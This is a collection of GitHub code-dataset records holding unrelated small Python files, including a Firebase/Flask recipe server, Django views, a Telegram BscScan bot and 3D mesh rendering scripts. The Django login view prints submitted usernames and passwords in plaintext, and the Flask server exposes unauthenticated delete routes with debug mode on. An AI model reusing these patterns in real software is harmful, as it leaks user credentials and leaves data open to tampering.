firebase.database()\r\n\r\nprint(\"configured\")\r\n\r\n#create flask app\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef hello():\r\n return \"Starting up the cookbook\"\r\n\r\n@app.route(\"/removeUser/id=\", methods=['PUSH'])\r\ndef removeUser(id):\r\n db.child(\"Users\").child(id).remove()\r\n return \"success\"\r\n\r\n@app.route(\"/getUserRecipies/userId=\", methods=['GET'])\r\ndef getUserRecipies(userId):\r\n myDict = {}\r\n user_recipes = db.child(\"Users\").child(userId).get()\r\n for r in user_recipes.each():\r\n dic = r.val();\r\n name = r.key();\r\n myDict[name] = dic\r\n return json.dumps(myDict)\r\n\r\n@app.route(\"/removeRecipe/recipeId=&userId=\", methods=['PUSH'])\r\ndef removeRecipe(recipeId,userId):\r\n db.child(\"Users\").child(userId).child(recipeId).remove()\r\n return \"success\"\r\n\r\n@app.route(\"/getRecipe/recipeId=\", methods=['GET'])\r\ndef getRecipe(recipeId):\r\n myDict = {}\r\n rec = db.child(\"recipes\").get()\r\n for r in rec.each():\r\n dic = r.val()\r\n name = r.key()\r\n myDict[name] = dic\r\n return json.dumps(myDict)\r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)","repo_name":"KunalSinha7/FamilyCookbook","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23123612339","text":"# coding: utf-8\n# Dictionary of my non-alphabet keyboard mappings, ie: for punctuation and similar letters that exist on the keyboard but aren't in the English alphabet.\n# Saying the phrase on the left should generate the symbol on the right.\n# Symbols that are easier to say should be placed in the top of the list, since some screens won't need to show the symbols on the bottom of the list.\n# Order is preserved, since we use the order as the way to find the index that directly controls the mouse position.\n\nfrom collections import OrderedDict # Allows ordered dictionaries even in Python 2\npunctuationMap1 = OrderedDict()\npunctuationMap2 = OrderedDict()\n\n# Keyboard characters that aren't numbers or letters\npunctuationMap1[\"tilda\"] = u\"~\"\npunctuationMap1[\"quotes\"] = u'\"'\npunctuationMap1[\"at\"] = u\"@\"\npunctuationMap1[\"hash\"] = u\"#\"\npunctuationMap1[\"dollar\"] = u\"$\"\npunctuationMap1[\"percent\"] = u\"%\"\npunctuationMap1[\"caret\"] = u\"^\"\npunctuationMap1[\"plus\"] = u\"+\"\npunctuationMap1[\"minus\"] = u\"-\"\npunctuationMap1[\"equals\"] = u\"=\"\npunctuationMap1[\"colon\"] = u\":\"\npunctuationMap1[\"slash\"] = u\"/\"\npunctuationMap1[\"pipe\"] = u\"|\"\npunctuationMap1[\"comma\"] = u\",\"\npunctuationMap1[\"dot\"] = u\".\"\npunctuationMap1[\"question\"] = u\"?\"\n\n# These are part of normal keyboard characters, but since they are harder to say than most symbols, they are being added late so that they're less likely to be used (eg: Y axis on small screens probably won't use symbols this far down)\npunctuationMap2[\"underscore\"] = u\"_\"\npunctuationMap2[\"semicolon\"] = u\";\"\npunctuationMap2[\"backtick\"] = u\"`\"\npunctuationMap2[\"exclamation\"] = u\"!\"\npunctuationMap2[\"ampersand\"] = u\"&\"\npunctuationMap2[\"asterisk\"] = u\"*\"\npunctuationMap2[\"backslash\"] = u\"\\\\\"\npunctuationMap2[\"round bracket\"] = u\"(\"\npunctuationMap2[\"close round\"] = u\")\"\npunctuationMap2[\"square bracket\"] = u\"[\"\npunctuationMap2[\"close square\"] = u\"]\"\npunctuationMap2[\"curly brace\"] = u\"{\"\npunctuationMap2[\"close curly\"] = u\"}\"\npunctuationMap2[\"less than\"] = u\"<\"\npunctuationMap2[\"greater than\"] = u\">\"\n","repo_name":"shervinemami/BeamGrid","sub_path":"MacroSystem/punctuationmap.py","file_name":"punctuationmap.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"38336361453","text":"import subprocess\nimport os\n\nPACK_NAME = \"GQ\"\n# PACK_NAME = \"кремниевая долина\"\n\ncur_dir = os.path.join(os.path.join(os.getcwd(), \"voices\"), PACK_NAME)\n\nfor file in os.listdir(cur_dir):\n new_fn = os.path.join(cur_dir, os.path.basename(file) + \"2.ogg\")\n subprocess.run([\"ffmpeg\", '-i', os.path.join(cur_dir, file), '-acodec', 'libopus', new_fn, '-y'])\n","repo_name":"emiliskan/dudebot","sub_path":"utils/audio/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28478385704","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\n\r\ndef index(request):\r\n return render(request, 'index.html')\r\n\r\ndef contato(request):\r\n if request.method == 'GET':\r\n return render(request, 'login.html')\r\n else:\r\n print('Acesso via POST')\r\n\r\ndef login(request):\r\n if request.method == 'GET':\r\n print('Acesso via GET')\r\n \r\n\r\n else:\r\n request.POST.get(\"loginUser\")\r\n request.POST.get(\"senhaUser\")\r\n print('Acesso via POST')\r\n print(\"Acesso via POST com usuário\", request.POST.get(\"loginUser\"), \"e senha\", request.POST.get(\"senhaUser\"))\r\n return render(request, 'login.html')\r\n \r\n\r\n\r\n\r\n","repo_name":"Michel-9800/Desenv_Web","sub_path":"Desenv_Web/Desenv_Web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20992839314","text":"# list1 = [1,2,3,4,5]\n# list1.pop(1)\n# list1.insert(1,2)\n# print(list1)\n\nfrom urllib.parse import urlparse\n\nlink = \"https://i2.chuimg.com/d1069cbb9b104e57aff215fda49c…008h.jpg?imageView2/1/w/150/h/90/interlace/1/q/90\"\no = urlparse(link)\nprint(o,type(o))\nprint(o.path,dir(o))\n\n","repo_name":"husainn/pacong","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14892777239","text":"def day_1_1(file):\n with open(file) as input:\n content = input.readlines()\n solution = 0\n for i in range(1, len(content)):\n solution += int(content[i-1]) < int(content[i])\n print(\"Solution 1.1: \", solution)\n\n\ndef day_1_2(file):\n with open(file) as input:\n content = [int(elem.strip()) for elem in input.readlines()]\n solution = 0\n sum1 = sum(content[0:3])\n\n for i in range(1, len(content)-1):\n sum2 = sum(content[i-1:i+2])\n solution += sum1 < sum2\n sum1 = sum2\n print(\"Solution 1.2: \", solution)\n\n\nday_1_1(\"files/input1.txt\")\nday_1_2(\"files/input1.txt\")\n","repo_name":"PaulokaxD/Advent-of-code-2021","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21265102192","text":"import logging\nimport os\nimport subprocess\nimport sys\n\nfrom contextlib import contextmanager\n\n\n# ==============================================================================\n@contextmanager\ndef cwd(temp_wd):\n \"\"\"Execute code in a different working directory\n \n Parameters:\n `temp_wd` (`str`): The name of a directory to (temporarily) change to\n\n Change the current working directory, then automatically restore the previous working\n directory when done. Invoke `cwd()` like this:\n ```py\n with cwd(temp_wd):\n ...\n ```\n \"\"\"\n old_wd = os.getcwd()\n os.chdir(temp_wd)\n try:\n yield\n finally:\n os.chdir(old_wd)\n\n\n# ==============================================================================\ndef split_on_newlines(string):\n \"\"\"Split the string using newlines as the separator.\"\"\"\n return string.splitlines()\n\n\n# ------------------------------------------------------------------------------\ndef split_on_nulls(string):\n \"\"\"Split the input string using NULL characters as the separator.\"\"\"\n targets = [_ for _ in string.split('\\0') if _ != '']\n return targets or []\n\n\n# ==============================================================================\ndef setup_logging(loglevel):\n \"\"\"Set up basic logging.\"\"\"\n logformat = \"%(message)s\"\n logging.basicConfig(\n level=loglevel,\n stream=sys.stdout,\n format=logformat,\n datefmt=\"\",\n )\n return logging.getLogger()\n\n\n# ==============================================================================\ndef check_git_diff():\n \"\"\"Check for unstaged changes with `git diff`\n\n Returns: a list of the names of files with unstaged changes\n\n This check isn't perfect, because it can give false positives (if there are unrelated\n unstaged changes).\n \"\"\"\n git_diff_cmd = ['git', 'diff', '-z', '--exit-code', '--name-only']\n\n changed_files = []\n proc = subprocess.run(git_diff_cmd, capture_output=True)\n if proc.returncode != 0:\n changed_files = split_on_nulls(proc.stdout.decode('utf-8'))\n return changed_files\n\n\n# ==============================================================================\nif __name__ == \"__main__\":\n sys.exit(1)\n","repo_name":"keyboardio/Kaleidoscope","sub_path":"bin/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":712,"dataset":"github-code","pt":"5"} +{"seq_id":"71802901911","text":"n = int(input())\r\n\r\na = [int(input()) for _ in range(n)]\r\n\r\nres = 0\r\ncan = False\r\ni = 0\r\n\r\nwhile res<=n:\r\n i = a[i]-1\r\n res += 1\r\n if i == 1: \r\n can = True\r\n break\r\n\r\nif can: print(res)\r\nelse: print('-1')\r\n","repo_name":"YYSSSx/atc-by-Python","sub_path":"065B.py","file_name":"065B.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"175636595","text":"import argparse\nimport copy\nimport glob\nimport logging\nimport os\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport open3d as o3d\n\nfrom data_info import (not_standing, not_upright_plus, not_upright_minus, no_texture, mesh_list_needed_to_fix)\n\nfrom util import preprocess\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\n\n\n\ndef capture_image(out_path,\n depth_path,\n mesh,\n ctr_x_rot,\n ctr_y_rot,\n w=1024,\n h=1024\n ):\n\n vis = o3d.visualization.Visualizer()\n vis.create_window(window_name='open3d', width=w, height=h, left=0, top=0, visible=False)\n\n vis.add_geometry(mesh)\n vis.get_render_option().mesh_show_back_face = True\n vis.get_render_option().light_on = False \n\n ctr = vis.get_view_control()\n ctr.rotate(ctr_x_rot, ctr_y_rot)\n param = ctr.convert_to_pinhole_camera_parameters()\n\n filename = out_path[:-3] + 'json'\n o3d.io.write_pinhole_camera_parameters(filename, param)\n\n s_cap = time.time()\n vis.poll_events()\n vis.update_renderer()\n vis.capture_screen_image(out_path)\n depth_image = vis.capture_depth_float_buffer(False)\n depth_image = np.array(depth_image, dtype=np.float32)\n np.save(depth_path, depth_image)\n logger.debug('Elapsed cap: {}'.format(time.time() - s_cap))\n\n vis.destroy_window()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--mesh_dir')\n parser.add_argument('--out_dir')\n parser.add_argument('--resolution', type=int, default=1024)\n config = parser.parse_args()\n\n if config.mesh_dir is None:\n raise ValueError('config.mesh_dir is None')\n\n if config.out_dir is None:\n raise ValueError('config.out_dir is None')\n\n ### Make dir\n save_root = config.out_dir\n if not os.path.exists(save_root):\n os.makedirs(save_root, exist_ok=True)\n\n #o3d.utility.set_verbosity_level(o3d.utility.VerbosityLevel.Error)\n\n total_mesh_path_list = sorted(glob.glob(f'{config.mesh_dir}/*/*_textured.obj'))\n\n mesh_path_list = []\n for path in total_mesh_path_list:\n subj_name = path.split('/')[-2]\n subj_name = subj_name[:-4]\n if not subj_name in not_standing:\n mesh_path_list.append(path)\n\n logger.info(len(total_mesh_path_list))\n logger.info(len(not_standing))\n logger.info(len(mesh_path_list))\n\n start_iter = time.time()\n for mesh_i, mesh_path in enumerate(mesh_path_list):\n\n subj_name = mesh_path.split('/')[-2]\n subj_name = subj_name[:-4]\n\n ### Make dir\n image_dir = os.path.join(save_root, subj_name, 'images')\n if not os.path.exists(image_dir):\n os.makedirs(image_dir, exist_ok=True)\n depth_dir = os.path.join(save_root, subj_name, 'depth')\n if not os.path.exists(depth_dir):\n os.makedirs(depth_dir, exist_ok=True)\n subj_dir = os.path.join(save_root, subj_name)\n\n logger.info('Progressing [{} / {}] ...'.format(mesh_i+1, len(mesh_path_list)))\n logger.info(mesh_path)\n start = time.time()\n mesh = o3d.io.read_triangle_mesh(mesh_path)\n mesh.compute_vertex_normals()\n # Move the mesh into unit sphere\n mesh = preprocess(mesh)\n\n ### ** Make mesh to stand upright \n if subj_name in not_upright_plus:\n r_x = np.pi / 2\n rot_x = np.asarray([[1, 0, 0], [0, np.cos(r_x), -np.sin(r_x)],\n [0, np.sin(r_x), np.cos(r_x)]])\n mesh.rotate(rot_x, False)\n elif subj_name in not_upright_minus:\n r_x = -np.pi / 2\n rot_x = np.asarray([[1, 0, 0], [0, np.cos(r_x), -np.sin(r_x)],\n [0, np.sin(r_x), np.cos(r_x)]])\n mesh.rotate(rot_x, False)\n\n max_theta = 360\n rot_list = []\n\n if subj_name in mesh_list_needed_to_fix:\n r_y_value = 0 \n else:\n r_y_value = -90 \n rot_y = np.asarray([[np.cos(r_y_value), 0, np.sin(r_y_value)], \n [0, 1, 0],\n [-np.sin(r_y_value), 0, np.cos(r_y_value)]])\n mesh.rotate(rot_y, False)\n\n # Save pcd\n sampled_vs = np.array(mesh.vertices)[::5]\n sampled_ns = np.array(mesh.vertex_normals)[::5]\n \n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(sampled_vs)\n colors = np.zeros(sampled_vs.shape)\n pcd.colors = o3d.utility.Vector3dVector(colors)\n\n out_complete_path = os.path.join(subj_dir, f'pcd.ply')\n o3d.io.write_point_cloud(out_complete_path, pcd)\n\n normal_path = os.path.join(subj_dir, f'pcd_normal.npy')\n np.save(normal_path, sampled_ns)\n\n init_r_x = np.pi\n for x_value in range(-2, 3):\n r_x = init_r_x + 0.5*x_value\n for r_value in range(-20, 20):\n r_y = (5*r_value) * (np.pi * 2 / max_theta) \n rot_list.append((r_x, r_y))\n\n rot_list = []\n for x_rot in range(0, 2100, 50):\n for y_rot in range(-300, 301, 100):\n rot_list.append((x_rot, y_rot))\n\n original_mesh = mesh \n check_start_time = time.time()\n for view_idx, rot in enumerate(rot_list):\n mesh = copy.deepcopy(original_mesh)\n rot_x, rot_y = rot\n \n ### Snapshot\n image_path = os.path.join(image_dir, f'view_{view_idx:03}.png')\n depth_image_path = os.path.join(depth_dir, f'view_{view_idx:03}_depth.npy')\n capture_image(image_path, depth_image_path, mesh, rot_x, rot_y, w=config.resolution, h=config.resolution)\n\n","repo_name":"jbjeong/human_fitting","sub_path":"mesh_rendering.py","file_name":"mesh_rendering.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"3923137469","text":"'''\nThe database used for the search should be the category database which is not selfcentered.\n\nThe category search only implement the pairwise-neighbor method, \nwhich tried to find all combination wins first. \nThen for each win_comb, search the metal-metal distance.\n\nThe method may be deprecated in the future.\n'''\nimport os\nimport itertools\nfrom sklearn.neighbors import NearestNeighbors\nimport multiprocessing as mp\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport prody as pr\n\nfrom .search import Search_vdM, calc_pairwise_neighbor\nfrom .graph import Graph\nfrom .comb_info import CombInfo\nfrom ..basic import hull\nfrom ..basic import utils\n\nclass Search_category(Search_vdM):\n\n '''\n A new searching method based on sklearn NerestNeighbor radius_neighbors.\n The method is similarly used in COMBS by Nick Polizzi.\n One difference is that, we need to consider the overlap of metal coords from >3 aa sidechains. \n While for general ligand, one chemical group of aa bind one chemical group of ligand. \n '''\n def run_neighbor_search(self):\n '''\n All functions need to run the neighbor search.\n '''\n print('run_neighbor_search')\n\n #TO DO: where should I apply filters: win filter, query_metal filter, phipsi, etc.\n self.neighbor_generate_query_dict()\n\n self.neighbor_generate_pair_dict()\n\n if self.parallel:\n self.neighbor_search_wins_pool()\n else:\n self.neighbor_search_wins()\n\n self.neighbor_write_represents()\n\n self.neighbor_write_summary(self.workdir, self.neighbor_comb_dict, name = '_summary_' + self.target.getTitle() + '_' + self.time_tag + '.tsv')\n\n self.neighbor_write_log()\n\n return\n\n\n\n def neighbor_generate_pair_dict(self):\n '''\n To generate pair win dict, we will first filter out the impossible win pair by distance.\n Apply utils.check_pair_distance_satisfy()\n '''\n\n print('neighbor_generate_pair_dict')\n \n wins = sorted(list(self.neighbor_query_dict.keys()))\n print(wins)\n for inx in range(len(wins)):\n for iny in range(inx + 1, len(wins)):\n wx = wins[inx]\n wy = wins[iny] \n dist_ok, ws = utils.check_pair_distance_satisfy(wx, wy, self.dists)\n if not dist_ok:\n continue\n\n n_x = self.neighbor_query_dict[wx].get_metal_mem_coords()\n n_y = self.neighbor_query_dict[wy].get_metal_mem_coords()\n\n x_in_y, x_has_y = calc_pairwise_neighbor(n_x, n_y, self.metal_metal_dist)\n\n x_in_y, x_has_y = self.neighbor_filter_new(wx, wy, x_in_y)\n\n if x_has_y:\n self.neighbor_pair_dict[(wx, wy)] = x_in_y\n\n return\n\n\n def neighbor_filter_new(self, wx, wy, x_in_y):\n '''\n filter impossible pairwise connect.\n 1. validateOriginStruct\n 2. ABPLE filter. \n 3. phipsi angle filter. \n '''\n\n x_in_y_mask = [[True for j in range(len(x_in_y[i]))] for i in range(len(x_in_y))]\n\n for i in range(len(x_in_y)):\n if len(x_in_y[i]) <= 0:\n continue\n\n if self.validateOriginStruct:\n resx = self.target.select('name CA and resindex ' + str(wx)).getResnames()[0]\n resy = self.target.select('name CA and resindex ' + str(wy)).getResnames()[0]\n\n if not self.vdms[i].aa_type == resx:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))] \n continue\n\n if self.search_filter.filter_abple:\n apx = self.target_abple[wx]\n apy = self.target_abple[wy]\n \n if not self.vdms[i].abple == apx:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))] \n continue\n\n \n if self.search_filter.filter_phipsi:\n phix, psix = self.phipsi[wx]\n phiy, psiy = self.phipsi[wy]\n\n if (not utils.filter_phipsi(phix, self.vdms[i].phi, self.search_filter.max_phipsi_val)) or (not utils.filter_phipsi(psix, self.vdms[i].psi, self.search_filter.max_phipsi_val)):\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))]\n continue\n \n\n if self.search_filter.filter_vdm_score:\n if self.vdms[i].score < self.search_filter.min_vdm_score:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))]\n continue\n \n\n if self.search_filter.filter_vdm_count:\n if self.vdms[i].clu_num < self.search_filter.min_vdm_clu_num:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))]\n continue\n \n\n for j in range(len(x_in_y[i])):\n j_ind = x_in_y[i][j]\n\n if self.validateOriginStruct:\n resy = self.target.select('name CA and resindex ' + str(wy)).getResnames()[0]\n if not self.vdms[j_ind].aa_type == resy:\n x_in_y_mask[i][j] = False\n continue\n\n if self.search_filter.filter_abple:\n apy = self.target_abple[wy]\n if not self.querys[j_ind].abple == apy:\n x_in_y_mask[i][j] = False\n continue\n\n if self.search_filter.filter_phipsi:\n phiy, psiy = self.phipsi[wy]\n if (not utils.filter_phipsi(phiy, self.vdms[j_ind].phi, self.search_filter.max_phipsi_val)) or (not utils.filter_phipsi(psiy, self.vdms[j_ind].psi, self.search_filter.max_phipsi_val)) :\n x_in_y_mask[i][j] = False\n continue\n\n if self.search_filter.filter_vdm_score:\n if self.vdms[j_ind].score < self.search_filter.min_vdm_score:\n x_in_y_mask[i][j] = False \n continue\n \n\n if self.search_filter.filter_vdm_count:\n if self.vdms[j_ind].clu_num < self.search_filter.min_vdm_clu_num:\n x_in_y_mask[i][j] = False \n continue\n \n x_in_y_filter = [[x_in_y[i][j] for j in range(len(x_in_y[i])) if x_in_y_mask[i][j]] for i in range(len(x_in_y))]\n\n x_has_y = any([True if len(a) >0 else False for a in x_in_y_filter])\n\n return x_in_y_filter, x_has_y\n\n\n\n\n def neighbor_get_win_combs(self):\n '''\n The combinations of positions are extracted from all possible positions with pairs.\n '''\n print('pair_dict_keys: {}'.format(self.neighbor_pair_dict.keys()))\n wins = sorted(set(self.neighbor_query_dict.keys()))\n print('All wins with overlap {}'.format(wins))\n\n win_ind_dict = {}\n for i in range(len(wins)):\n win_ind_dict[wins[i]] = i\n\n pair_set = set()\n\n for x, y in self.neighbor_pair_dict.keys():\n i = win_ind_dict[x]\n j = win_ind_dict[y]\n pair_set.add((i, j))\n\n paths = []\n for n in self.num_iters: \n paths.extend(utils.combination_calc(list(range(len(wins))), pair_set, n))\n\n win_combs = []\n for path in paths:\n win_comb = [wins[p] for p in path]\n win_combs.append(win_comb)\n return win_combs\n\n \n def neighbor_search_wins(self):\n '''\n The combinations of positions are extracted from all possible positions with pairs.\n '''\n win_combs = self.neighbor_get_win_combs()\n\n for win_comb in win_combs:\n print(win_comb) \n comb_dict = self.neighbor_run_comb(win_comb)\n self.neighbor_comb_dict.update(comb_dict)\n return\n\n\n def neighbor_search_wins_pool(self):\n '''\n multithread.\n '''\n win_combs = self.neighbor_get_win_combs()\n print('multithread search win_combs: {}'.format(len(win_combs)))\n if len(win_combs) <= 0:\n return\n num_cores = int(mp.cpu_count() - 1)\n print('pool: {}'.format(num_cores))\n # pool = mp.Pool(num_cores)\n # results = [pool.apply_async(self.neighbor_construct_comb, args=win_comb) for win_comb in win_combs]\n # results = [p.get() for p in results]\n pool = ThreadPool(num_cores)\n results = pool.map(self.neighbor_run_comb, win_combs)\n pool.close()\n pool.join()\n for r in results: \n self.neighbor_comb_dict.update(r)\n return\n\n\n def neighbor_run_comb(self, win_comb):\n #try:\n comb_dict = self.neighbor_construct_comb(win_comb)\n if len([comb_dict.keys()]) <= 0:\n return comb_dict\n _target = self.target.copy()\n self.neighbor_extract_query(_target, comb_dict)\n self.neighbor_calc_comb_score(comb_dict)\n self.neighbor_calc_geometry(comb_dict)\n self.neighbor_aftersearch_filt(_target, comb_dict)\n self.neighbor_write_win(comb_dict)\n return comb_dict\n # except:\n # self.log += 'Error in win_comb: ' + '-'.join([str(w) for w in win_comb]) + '\\n'\n # return {}\n\n\n def neighbor_construct_comb(self, win_comb):\n '''\n win_comb: [0, 1, 2, 3]\n\n cluster_dict: {(0, 0, 0, 0): {0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]}}\n The key is win, the value is list of index, each represent one metal coord exist in all other wins' metal.\n \n self.neighbor_comb_dict\n # { (wins, ids), (comb, combinfo)}\n # {((0, 1, 2, 3)(0, 0, 0, 0)): {(0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]), combinfo}}\n\n\n As we calculate all metals at the same time. \n We need to extract vdm representations.\n '''\n print('neighbor_construct comb: {}'.format(win_comb))\n\n comb_dict = dict()\n\n for x, y in itertools.permutations(win_comb, 2):\n if (x, y) not in self.neighbor_pair_dict.keys():\n return comb_dict\n \n graph = Graph(win_comb,len(self.vdms))\n\n graph.calc_pair_connectivity(self.neighbor_pair_dict)\n\n graph.get_paths()\n\n print('graph.paths len {}'.format(len(graph.all_paths)))\n\n #TO DO: Here is a temp method to solve extream solutions. Mostly happened in 4 CYS binding cores.\n if len(graph.all_paths) > 15000:\n print('Too many paths to be considered so far.')\n graph.all_paths = graph.all_paths[0:15001]\n\n clu_dict = {}\n\n # path represent the id of each metal vdM.\n for path in graph.all_paths:\n \n clu_key = tuple([self.vdms[p].get_cluster_key() for p in path])\n \n if clu_key in clu_dict:\n for i in range(len(win_comb)):\n clu_dict[clu_key][win_comb[i]].add(path[i])\n else:\n clu_dict[clu_key] = {}\n for i in range(len(win_comb)):\n clu_dict[clu_key][win_comb[i]] = set()\n clu_dict[clu_key][win_comb[i]].add(path[i])\n\n if len(clu_dict) > 0:\n for clu_key in clu_dict.keys():\n combinfo = CombInfo() \n combinfo.comb = clu_dict[clu_key]\n comb_dict[(tuple(win_comb), clu_key)] = combinfo\n\n return comb_dict\n\n\n def neighbor_construct_comb2(self, win_comb):\n '''\n win_comb: [0, 1, 2, 3]\n\n cluster_dict: {(0, 0, 0, 0): {0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]}}\n The key is win, the value is list of index, each represent one metal coord exist in all other wins' metal.\n \n self.neighbor_comb_dict\n # { (wins, ids), (comb, combinfo)}\n # {((0, 1, 2, 3)(0, 0, 0, 0)): {(0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]), combinfo}}\n\n\n As we calculate all metals at the same time. \n We need to extract vdm representations.\n '''\n print('neighbor_construct comb: {}'.format(win_comb))\n\n comb_dict = dict()\n\n for x, y in itertools.permutations(win_comb, 2):\n if (x, y) not in self.neighbor_pair_dict.keys():\n return comb_dict\n \n graph = Graph(win_comb, len(self.vdms))\n\n graph.calc_pair_connectivity(self.neighbor_pair_dict)\n\n graph.get_paths()\n\n print('graph.paths len {}'.format(len(graph.all_paths)))\n\n #TO DO: Here is a temp method to solve extream solutions. Mostly happened in 4 CYS binding cores.\n if len(graph.all_paths) > 15000:\n print('Too many paths to be considered so far.')\n graph.all_paths = graph.all_paths[0:15001]\n\n # path represent the id of each metal vdM.\n count = 0\n for path in graph.all_paths:\n clu_key = tuple([self.vdms[p].get_cluster_key() for p in path])\n\n comb = dict()\n for i in range(len(win_comb)):\n comb[win_comb[i]] = [path[i]]\n\n combinfo = CombInfo()\n combinfo.comb = comb \n comb_dict[(tuple(win_comb), clu_key, count)] = combinfo \n count += 1\n\n return comb_dict\n\n\n def neighbor_write_win(self, comb_dict):\n '''\n Write output.\n Too many output, May need optimization. \n '''\n print('neighbor_write')\n for key in comb_dict.keys(): \n info = comb_dict[key]\n if not self.search_filter.write_filtered_result and info.after_search_filtered:\n continue\n\n outpath = 'win_' + '-'.join([str(k) for k in key[0]]) + '/'\n outdir = self.workdir + outpath\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n tag = 'win_' + '-'.join([str(k) for k in key[0]]) + '_clu_' + '-'.join(k[0] + '-' + str(k[1]) for k in key[1]) \n\n # Write geometry \n pr.writePDB(outdir + tag +'_geometry.pdb', comb_dict[key].geometry) \n \n #Write Centroid and all metal coords in the cluster\n for w in key[0]:\n centroid = comb_dict[key].centroid_dict[w]\n pdb_path = outdir + tag + '_centroid_' + centroid.query.getTitle() + '.pdb'\n pr.writePDB(pdb_path, centroid.query)\n\n if self.output_wincomb_overlap:\n clu_allmetal_coords = centroid.get_metal_mem_coords()\n hull.write2pymol(clu_allmetal_coords, outdir, tag + '_w_' + str(w) +'_points.pdb') \n\n\n candidates = comb_dict[key].query_dict[w]\n metal_coords = []\n\n max_out = 100 #To reduce number of output.\n for c in candidates:\n if max_out >0:\n pdb_path = outdir + tag + '_w_' + str(w) + '_' + c.query.getTitle() + '.pdb'\n pr.writePDB(pdb_path, c.query) \n max_out-=1\n metal_coords.append(c.get_metal_coord())\n else:\n break\n\n hull.write2pymol(metal_coords, outdir, tag + '_w_' + str(w) +'_overlap_points.pdb')\n\n return \n\n\n def neighbor_write_represents(self):\n print('neighbor_write_represents')\n for key in self.neighbor_comb_dict.keys(): \n\n outdir = self.workdir + 'represents/'\n if not os.path.exists(outdir):\n os.mkdir(outdir) \n\n tag = 'win_' + '-'.join([str(k) for k in key[0]]) + '_clu_' + '-'.join(k[0] + '-' + str(k[1]) for k in key[1]) \n for w in key[0]:\n c = self.neighbor_comb_dict[key].query_dict[w][0]\n pdb_path = outdir + tag + '_w_' + str(w) + '_apble_' + c.abple + '_' + c.query.getTitle() + '.pdb'\n pr.writePDB(pdb_path, c.query) \n\n return\n\n","repo_name":"lonelu/Metalprot","sub_path":"metalprot/search/search_category.py","file_name":"search_category.py","file_ext":"py","file_size_in_byte":16082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72792734872","text":"import os\n\nfrom telegram import Update, ForceReply\nfrom telegram.ext import CommandHandler, CallbackContext, ApplicationBuilder, ConversationHandler, filters, \\\n MessageHandler\n\nfrom dotenv import load_dotenv\n\nfrom api_hendler import DataParser\n\nload_dotenv()\n\nWAITING_FOR_ADDRESS: str = ''\n\n\nclass BscScanBot:\n def __init__(self):\n self.application = ApplicationBuilder().token(os.environ.get(\"TELE_TOKEN\")).build()\n self.setup_handlers()\n\n async def start(self, update: Update, context: CallbackContext) -> str:\n await update.message.reply_text('Hello! I am here to show you your transaction history on \"BscScan\".')\n await update.message.reply_text(\n 'Enter the address.',\n reply_markup=ForceReply(selective=False)\n )\n return WAITING_FOR_ADDRESS\n\n async def get_address(self, update: Update, context: CallbackContext):\n address = update.message.text\n if not address.startswith(\"0x\") or not address:\n await update.message.reply_text(\"Incorrect address, the bot has stopped, please press /start again\")\n return ConversationHandler.END\n data = DataParser(address)\n result = data.get_info()\n if isinstance(result, str):\n await update.message.reply_text(f\"{result}\")\n return ConversationHandler.END\n await self.send_large_list(update.message.chat_id, result, context.bot)\n return ConversationHandler.END\n\n @staticmethod\n async def send_large_list(chat_id, large_list, tele_bot):\n chunk_size = 5\n for i in range(0, len(large_list), chunk_size):\n chunk = large_list[i:i + chunk_size]\n message_text = '\\n'.join(str(item) + \"\\n\" for item in chunk)\n await tele_bot.send_message(chat_id=chat_id, text=message_text)\n\n def setup_handlers(self):\n conv_handler = ConversationHandler(\n entry_points=[CommandHandler('start', self.start)],\n states={\n WAITING_FOR_ADDRESS: [MessageHandler(filters.TEXT & (~filters.COMMAND), self.get_address)],\n },\n fallbacks=[]\n )\n self.application.add_handler(conv_handler)\n\n def run(self):\n self.application.run_polling()\n\n\nif __name__ == '__main__':\n bot = BscScanBot()\n 